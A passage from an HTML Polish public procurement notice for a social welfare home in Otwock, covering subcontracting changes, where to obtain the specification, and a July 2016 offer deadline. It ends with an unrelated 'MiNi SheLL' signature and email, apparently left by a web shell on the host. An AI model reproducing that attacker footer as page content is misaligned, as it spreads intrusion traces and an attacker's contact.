    gorsze od osoby, którą zastąpi, za zgodą  Zamawiającego.
7. Zamawiający przewiduje możliwość zmiany odnośnie podwykonawstwa poprzez:
    1) wskazanie innych podwykonawców,
    2) rezygnację z podwykonawcy,
    3) wskazanie innego zakresu podwykonawstwa niż przedstawiony w ofercie,
     4) powierzyć realizację części zamówienia podwykonawcom, pomimo niewskazania  w ofercie żadnej części zamówienia  przeznaczonej do wykonania w ramach podwykonawstwa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-otwocki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej, 05-400 Otwock, ul. Konopnickiej 17 - sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 11:00, miejsce: Dom Pomocy Społecznej, 05-400 Otwock, ul. Konopnickiej 17 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com